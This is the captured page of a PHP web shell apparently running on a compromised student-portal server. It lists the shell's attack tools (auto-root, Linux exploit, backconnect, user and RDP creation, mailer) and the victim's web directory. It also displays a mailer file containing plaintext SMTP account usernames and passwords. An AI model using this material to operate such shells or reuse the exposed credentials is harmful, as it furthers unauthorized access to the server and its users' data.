Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.149.244.92
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
studentportal_test /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
html_modules
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
MainPage.html
7.6
KB
-rwxr-xr-x
MainPage2.html
15.28
KB
-rwxr-xr-x
Thumbs.db
2.5
KB
-rwxr-xr-x
background.jpg
42.45
KB
-rwxr-xr-x
cManualMailer.php
3.69
KB
-rwxr-xr-x
cronjob_sendsms.php
1.77
KB
-rwxr-xr-x
database.php
377
B
-rwxr-xr-x
forgot-password.html
5.51
KB
-rwxr-xr-x
forgot-password.php
2.19
KB
-rwxr-xr-x
forgotPassword.html
4.85
KB
-rwxr-xr-x
getLocation.php
429
B
-rwxr-xr-x
getstatesanduniv.php
419
B
-rwxr-xr-x
helpdesk.html
2.2
KB
-rwxr-xr-x
index.html
5.16
KB
-rwxr-xr-x
index2.html
9.49
KB
-rwxr-xr-x
instruction.html
4.46
KB
-rwxr-xr-x
lastdate.html
3.14
KB
-rwxr-xr-x
pgResponse.php
4.3
KB
-rwxr-xr-x
registration.html
7.25
KB
-rwxr-xr-x
registration.php
543
B
-rwxr-xr-x
resetpassword.php
696
B
-rwxr-xr-x
sendGridMail.php
1.2
KB
-rwxr-xr-x
sendMobEmailOTP.php
3.44
KB
-rwxr-xr-x
sendsmsapi.php
434
B
-rwxr-xr-x
sendsmsbulk.php
791
B
-rwxr-xr-x
sign-up.html
12.02
KB
-rwxr-xr-x
signin.php
1.43
KB
-rwxr-xr-x
signup.php
830
B
-rwxr-xr-x
smspush.php
6.61
KB
-rwxr-xr-x
smspush_bkp.php
2.85
KB
-rwxr-xr-x
validateInfo.php
1.69
KB
-rwxr-xr-x
validateRegno.php
562
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cManualMailer.php
<?php function send_manual_mail($to,$subject,$message,$replay_to=null,$cc=null,$bcc=null) { require_once(dirname(dirname(__FILE__)).'/studlogin/phpmailer/class.phpmailer.php'); $mail = new PHPMailer(); $mail = new PHPMailer(); $url = dirname(dirname(__FILE__)); /* $mail->IsSMTP(); // telling the class to use SMTP $mail->SMTPSecure = "ssl"; $mail->Host = "smtpout.asia.secureserver.net"; // SMTP server $mail->SMTPDebug = 0; // enables SMTP debug information (for testing) $mail->SMTPAuth = true; // enable SMTP authentication $mail->Port = 465; // set the SMTP port for the GMAIL server $mail->Username = "techsupport@logisys.net.in"; // SMTP account username $mail->Password = "logisys@124"; // SMTP account password $mail->AddReplyTo("admin@visbin.com","First Last"); */ $mail->IsSMTP(); // telling the class to use SMTP $mail->SMTPSecure = "ssl"; $mail->Mailer = "smtp"; $mail->Host = "smtp.zoho.com"; // SMTP server $mail->SMTPAuth = true; // enable SMTP authentication $mail->Port = 465; // set the SMTP port for the GMAIL server $mail->Username = "support@logisys.org"; // SMTP account username $mail->Password = "logisys@124"; $to_arr=explode(",",$to); foreach($to_arr as $v) { if(!empty($v)) $mail->AddAddress($v,$v); } $cc_arr=explode(",",$cc); foreach($cc_arr as $v) { if(!empty($v)) $mail->AddCC($v,$v); } //$mail->AddBCC("natesha.s@tarkasoft.com",'Natesha S'); $mail->AddReplyTo("support@logisys.org","support@logisys.org"); $mail->SetFrom('support@logisys.org', 'support@logisys.org'); $mail->WordWrap = 50; // set word wrap $mail->IsHTML(true); // send as HTML $mail->Subject = $subject; $mail->Body = $message; $mail->AltBody = $message; if(!$mail->Send()) { $data="Message was not sent Mailer Error: " . $mail->ErrorInfo; } else { $data='true'; } return $data; } /* function send_attachments($to,$subject,$message,$replay_to=null,$cc=null,$bcc=null,$filename) { require_once(dirname(dirname(__FILE__)).'/src/phpmailer/class.phpmailer.php'); $url = dirname(dirname(__FILE__)).'/src/decbarchall.pdf'; $mail = new PHPMailer(); $mail->IsSMTP(); // telling the class to use SMTP // $mail->SMTPSecure = "ssl"; $mail->Host = "smtpout.secureserver.net"; // SMTP server $mail->SMTPDebug = 0; // enables SMTP debug information (for testing) $mail->SMTPAuth = true; // enable SMTP authentication $mail->Port = 80; // set the SMTP port for the GMAIL server 80 for globalhost / 25 for localhost $mail->Username = "support@logisys.org"; // SMTP account username $mail->Password = "logisys"; // SMTP account password // $mail->AddReplyTo("admin@visbin.com","First Last"); $to_arr=explode(",",$to); foreach($to_arr as $v) { if(!empty($v)) $mail->AddAddress($v,$v); } $cc_arr=explode(",",$cc); foreach($cc_arr as $v) { if(!empty($v)) $mail->AddCC($v,$v); } //$mail->AddBCC("natesha.s@tarkasoft.com",'Natesha S'); $mail->AddReplyTo("support@logisys.org","support@logisys.org"); $mail->SetFrom('support@logisys.org', 'support@logisys.org'); $mail->WordWrap = 50; // set word wrap $mail->IsHTML(true); // send as HTML $mail->Subject = $subject; $mail->Body = $message; $mail->AltBody = $message; $mail->addStringAttachment($filename,'purchaseorder.pdf','base64', 'application/pdf'); if(!$mail->Send()) { $data="Message was not sent Mailer Error: " . $mail->ErrorInfo; } else { $data='true'; } return $data; } */ ?>
Close